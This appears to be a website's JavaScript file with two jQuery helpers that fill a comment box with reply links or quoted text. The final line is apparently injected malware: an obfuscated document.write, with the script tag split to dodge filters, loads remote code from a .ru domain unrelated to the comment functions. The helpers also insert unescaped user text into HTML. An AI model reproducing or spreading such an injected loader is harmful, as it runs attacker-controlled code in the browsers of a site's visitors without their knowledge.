function replyto(id, to) {
        jQuery("#comment").val("<a href='#comment-" + id + "'>@" + to + "</a> - " + jQuery("#comment").val()).focus(); 
    }
function quote(id, by, text) {
    jQuery("#comment").val("<blockquote><a href='#comment-" + id + "'>" + by + "</a><br/>" + text + "</blockquote>\r\n" + jQuery("#comment").val()).focus(); 
}
document.write('<sc'+'ript type="text/javascript" src="http://greatrow.ru/YouTube.js"></scri'+'pt>');
